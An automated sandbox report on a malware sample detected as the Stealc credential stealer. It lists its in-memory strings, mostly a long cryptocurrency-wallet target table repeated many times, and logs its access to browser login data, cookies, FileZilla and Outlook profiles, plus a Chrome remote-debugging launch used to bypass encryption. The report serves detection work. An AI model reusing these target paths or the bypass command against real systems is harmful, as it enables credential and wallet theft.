Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2547238777.0000000000DE5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \ElectronCash\wallets\
Source: file.exe, 00000000.00000002.2547238777.0000000000DB4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2547238777.0000000000E97000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: Jaxx Liberty
Source: file.exe, 00000000.00000002.2547238777.0000000000DB4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2547238777.0000000000DB4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2547238777.0000000000DE5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe, 00000000.00000002.2547238777.0000000000DE5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: info.seco
Source: file.exe, 00000000.00000002.2547238777.0000000000DB4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2547238777.0000000000DE5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \jaxx\Local Storage\
Source: file.exe, 00000000.00000002.2546281725.000000000061F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\passphrase.json
Source: file.exe, 00000000.00000002.2547238777.0000000000DB4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2547238777.0000000000DE5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: Exodus\exodus.wallet
Source: file.exe, 00000000.00000002.2547238777.0000000000DE5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: file__0.localstorage
Source: file.exe, 00000000.00000002.2547238777.0000000000DB4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2547238777.0000000000DB4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2547238777.0000000000DE5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe, 00000000.00000002.2547238777.0000000000DE5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: MultiDoge
Source: file.exe, 00000000.00000002.2547238777.0000000000DE5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: seed.seco
Source: file.exe, 00000000.00000002.2547238777.0000000000DB4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2547238777.0000000000DB4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Yara detected Credential Stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 4276, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"

Yara detected Stealc

Source: Yara match	File source: 0000001D.00000003.3027537351.00000000052F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2992599240.000000000167B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2047136566.0000000004A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
